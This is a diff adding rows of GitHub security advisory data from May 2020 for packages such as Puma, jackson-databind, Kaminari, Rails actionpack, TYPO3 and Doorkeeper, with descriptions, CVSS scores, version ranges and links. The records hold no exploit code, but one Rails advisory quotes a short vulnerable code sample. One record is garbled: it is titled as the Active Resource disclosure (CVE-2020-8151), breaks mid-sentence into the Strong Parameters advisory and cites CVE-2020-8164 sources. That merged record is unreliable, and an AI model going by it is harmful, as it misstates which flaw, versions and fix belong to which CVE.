+* Email [current maintainer at 2020-05](mailto:temotor@gmail.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'httplib2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11078'}, {'type': 'WEB', 'url': 'https://github.com/httplib2/httplib2/commit/a1457cc31f3206cf691d11d2bf34e98865873e9e'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r23711190c2e98152cb6f216b95090d5eeb978543bb7e0bad22ce47fc@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4d35dac106fab979f0db75a07fc4e320ad848b722103e79667ff99e1@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r69a462e690b5f2c3d418a288a2c98ae764d58587bd0b5d6ab141f25f@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7f364000066748299b331b615ba51c62f55ab5b201ddce9a22d98202@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad8872fc99f670958c2774e2bf84ee32a3a0562a0c787465cf3dfa23@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9eff9572946142b657c900fe63ea4bbd3535911e8d4ce4d08fe4b89@%3Ccommits.allura.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/06/msg00000.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IXCX2AWROGWGY5GXR7VN3BKF34A2FO6J/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PZJ3D6JSM7CFZESZZKGUW2VX55BOSOXI/'}]","{'cwe_ids': ['CWE-93'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-05-20T15:55:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x7jg-6pwg-fx5h,2023-05-16T15:53:31Z,2020-05-22T14:55:05Z,,['CVE-2020-11076'],HTTP Smuggling via Transfer-Encoding Header in Puma,"### Impact
+
+By using an invalid transfer-encoding header, an attacker could [smuggle an HTTP response.](https://portswigger.net/web-security/request-smuggling)
+
+Originally reported by @ZeddYu, who has our thanks for the detailed report.
+
+### Patches
+
+The problem has been fixed in Puma 3.12.5 and Puma 4.3.4.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue in [Puma](https://github.com/puma/puma)
+* See our [security policy](https://github.com/puma/puma/security/policy)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.12.5'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/puma/puma/security/advisories/GHSA-x7jg-6pwg-fx5h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11076'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/commit/f24d5521295a2152c286abb0a45a1e1e2bd275bd'}, {'type': 'PACKAGE', 'url': 'https://github.com/puma/puma'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/blob/master/History.md#434435-and-31253126--2020-05-22'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puma/CVE-2020-11076.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/10/msg00009.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SKIY5H67GJIGJL6SMFWFLUQQQR3EMVPR/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00034.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00038.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-22T14:40:36Z', 'nvd_published_at': '2020-05-22T15:15:00Z'}"
+1.4.0,GHSA-q93h-jc49-78gg,2023-09-14T15:09:39Z,2020-05-15T18:59:10Z,,['CVE-2020-9547'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.7.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9547'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2634'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200904-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-04-22T20:58:56Z', 'nvd_published_at': '2020-03-02T04:15:00Z'}"
+1.4.0,GHSA-r5jw-62xg-j433,2021-09-23T13:55:11Z,2020-05-28T21:10:11Z,,['CVE-2020-11082'],Cross-Site Scripting in Kaminari,"### Impact
+In Kaminari before 1.2.1, there is a vulnerability that would allow an attacker to inject arbitrary code into pages with pagination links. This has been fixed in 1.2.1.
+
+### Releases
+The 1.2.1 gem including the patch has already been released.
+All past released versions are affected by this vulnerability.
+
+### Workarounds
+Application developers who can't update the gem can workaround by overriding the `PARAM_KEY_EXCEPT_LIST` constant.
+
+```ruby
+module Kaminari::Helpers
+ PARAM_KEY_EXCEPT_LIST = [:authenticity_token, :commit, :utf8, :_method, :script_name, :original_script_name].freeze
+end
+```
+
+### Credits
+Thanks to Daniel Mircea for finding the issue and sending a patch via GitHub. Also thanks to Aditya Prakash for reporting the vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'kaminari'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kaminari/kaminari/security/advisories/GHSA-r5jw-62xg-j433'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11082'}, {'type': 'WEB', 'url': 'https://github.com/github/advisory-review/pull/1020'}, {'type': 'WEB', 'url': 'https://github.com/kaminari/kaminari/commit/8dd52a1aed3d2fa2835d836de23fc0d8c4ff5db8'}, {'type': 'PACKAGE', 'url': 'https://github.com/kaminari/kaminari'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/kaminari/CVE-2020-11082.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00011.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5005'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-28T21:05:32Z', 'nvd_published_at': '2020-05-28T21:15:00Z'}"
+1.4.0,GHSA-2m7g-9q74-9m3q,2021-08-25T21:06:45Z,2020-05-06T20:49:04Z,,['CVE-2020-1929'],Improper Certificate Validation in Apache Beam,The Apache Beam MongoDB connector in versions 2.10.0 to 2.16.0 has an option to disable SSL trust verification. However this configuration is not respected and the certificate verification disables trust verification in every case. This exclusion also gets registered globally which disables trust checking for any code running in the same JVM.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.beam:beam-sdks-java-io-mongodb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.10.0'}, {'fixed': '2.17.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.16.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1929'}, {'type': 'WEB', 'url': 'https://github.com/apache/beam/commit/a7dd23d95d2d214b4110781b5a28802bd43b834b'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/beam'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd0e85b71bf0274471b40fa1396d77f7b2d1165eaea4becbdc69aa04%40%3Cuser.beam.apache.org%3E'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-06T20:48:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jp5v-5gx4-jmj9,2023-08-08T15:18:54Z,2020-05-26T15:11:13Z,,['CVE-2020-8166'],Ability to forge per-form CSRF tokens in Rails,"It is possible to, given a global CSRF token such as the one present in the authenticity_token meta tag, forge a per-form CSRF token for any action for that session.
+
+Impact
+------
+
+Given the ability to extract the global CSRF token, an attacker would be able to construct a per-form CSRF token for that session.
+
+Workarounds
+-----------
+
+This is a low-severity security issue. As such, no workaround is necessarily until such time as the application can be upgraded.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.4.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.4.2'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8166'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/732415'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8166.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/rubyonrails-security/NOjKiGeXUgw'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-26T15:10:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-46j2-xjgp-jrfm,2023-01-23T20:28:50Z,2020-05-21T21:09:38Z,,['CVE-2020-8151'],Information disclosure issue in Active Resource,There is a possible information disclosure issue in Active Resource = 5.2.4.3, rails >= 6.0.3.1
+
+Impact
+------
+In some cases user supplied information can be inadvertently leaked from
+Strong Parameters. Specifically the return value of `each`, or `each_value`,
+or `each_pair` will return the underlying ""untrusted"" hash of data that was
+read from the parameters. Applications that use this return value may be
+inadvertently use untrusted user input.
+
+Impacted code will look something like this:
+
+```
+def update
+ # Attacker has included the parameter: `{ is_admin: true }`
+ User.update(clean_up_params)
+end
+
+def clean_up_params
+ params.each { |k, v| SomeModel.check(v) if k == :name }
+end
+```
+
+Note the mistaken use of `each` in the `clean_up_params` method in the above
+example.
+
+Workarounds
+-----------
+Do not use the return values of `each`, `each_value`, or `each_pair` in your
+application.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.4.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.4.2'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8164'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/292797'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8164.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/rubyonrails-security/f6ioe4sdpbY'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/f6ioe4sdpbY'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4766'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00089.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00093.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00107.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-26T15:06:53Z', 'nvd_published_at': '2020-06-19T17:15:00Z'}"
+1.4.0,GHSA-fqwf-pjwf-7vqv,2023-09-14T15:37:11Z,2020-05-15T18:59:04Z,,['CVE-2020-10673'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4 and 2.6.7.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.10.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10673'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2660'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200403-0002/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-22T20:59:03Z', 'nvd_published_at': '2020-03-18T22:15:00Z'}"
+1.4.0,GHSA-2wj9-434x-9hvp,2021-01-08T20:16:42Z,2020-05-13T23:29:04Z,,['CVE-2020-11067'],Insecure Deserialization in Backend User Settings in TYPO3 CMS,"It has been discovered that backend user settings (in $BE_USER->uc) are vulnerable to insecure deserialization. In combination with vulnerabilities of 3rd party components this can lead to remote code execution. A valid backend user account is needed to exploit this vulnerability.
+
+Update to TYPO3 versions 9.5.17 or 10.4.2 that fix the problem described.
+
+### References
+* https://typo3.org/security/advisory/typo3-core-sa-2020-005","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.17'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-2wj9-434x-9hvp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11067'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-13T23:28:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r854-96gq-rfg3,2023-09-05T09:25:57Z,2020-05-18T17:41:19Z,,['CVE-2014-1933'],Pillow Temporary file name leakage,"The (1) JpegImagePlugin.py and (2) EpsImagePlugin.py scripts in Python Image Library (PIL) 1.1.7 and earlier and Pillow before 2.3.1 uses the names of temporary files on the command line, which makes it easier for local users to conduct symlink attacks by listing the processes.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-1933'}, {'type': 'WEB', 'url': 'https://github.com/python-imaging/Pillow/commit/4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-imaging/Pillow'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201612-52'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-updates/2014-05/msg00002.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/02/10/15'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/02/11/1'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/65513'}, {'type': 'WEB', 'url': 'http://www.ubuntu.com/usn/USN-2168-1'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-05-18T17:41:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h98h-8mxr-m8gx,2021-08-25T21:09:12Z,2020-05-13T16:01:35Z,,['CVE-2018-21233'],Out-of-bounds read in TensorFlow possibly causing disclosure of the contents of process memory.,"TensorFlow before 1.7.0 has an integer overflow that causes an out-of-bounds read, possibly causing disclosure of the contents of process memory. This occurs in the DecodeBmp feature of the BMP decoder in core/kernels/decode_bmp_op.cc.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-21233'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/49f73c55d56edffebde4bca4a407ad69c1cae433'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow/'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2018-001.md'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-13T16:01:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j7vx-8mqj-cqp9,2021-07-29T16:42:27Z,2020-05-07T21:11:07Z,,['CVE-2020-10187'],Exposure of Sensitive Information to an Unauthorized Actor in Doorkeeper,"### Impact
+Information disclosure vulnerability. Allows an attacker to see all `Doorkeeper::Application` model attribute values (including secrets) using authorized applications controller if it's enabled (GET /oauth/authorized_applications.json).
+
+### Patches
+
+These versions have the fix:
+
+* 5.0.3
+* 5.1.1
+* 5.2.5
+* 5.3.2
+
+### Workarounds
+Patch `Doorkeeper::Application` model `#as_json(options = {})` method and define only those attributes you want to expose.
+
+Additional recommended hardening is to enable application secrets hashing ([guide](https://doorkeeper.gitbook.io/guides/security/token-and-application-secrets)), available since Doorkeeper 5.1. This would render the exposed secret useless.
+
+### References
+
+- Commit with fix: https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10187","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'doorkeeper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'doorkeeper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.1'}]}], 'versions': ['5.1.0']}, {'package': {'ecosystem': 'RubyGems', 'name': 'doorkeeper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.5'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'doorkeeper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/security/advisories/GHSA-j7vx-8mqj-cqp9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10187'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/pull/446'}, {'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6'}, {'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/releases'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/doorkeeper/CVE-2020-10187.yml'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-07T21:09:24Z', 'nvd_published_at': '2020-05-04T14:15:00Z'}"
+1.4.0,GHSA-gw55-jm4h-x339,2021-10-08T19:56:49Z,2020-05-08T18:54:39Z,,['CVE-2020-11050'],Improper Validation of Certificate with Host Mismatch in Java-WebSocket,"The Java-WebSocket Client does not perform hostname verification.
+
+ - This means that SSL certificates of other hosts are accepted as long as they are trusted. To exploit this vulnerability an attacker has to perform a man-in-the-middle (MITM) attack between a Java application using the Java-WebSocket Client and an WebSocket server it's connecting to.
+ - TLS normally protects users and systems against MITM attacks, it cannot if certificates from other trusted hosts are accepted by the client.
+
+For more information see: CWE-297: Improper Validation of Certificate with Host Mismatch - https://cwe.mitre.org/data/definitions/297.html
+
+## Important note
+
+The OWASP Dependency-Check (https://jeremylong.github.io/DependencyCheck/index.html) may report that a dependency of your project is affected by this security vulnerability, but you don't use this lib.
+This is caused by the fuzzy search in the OWASP implementation.
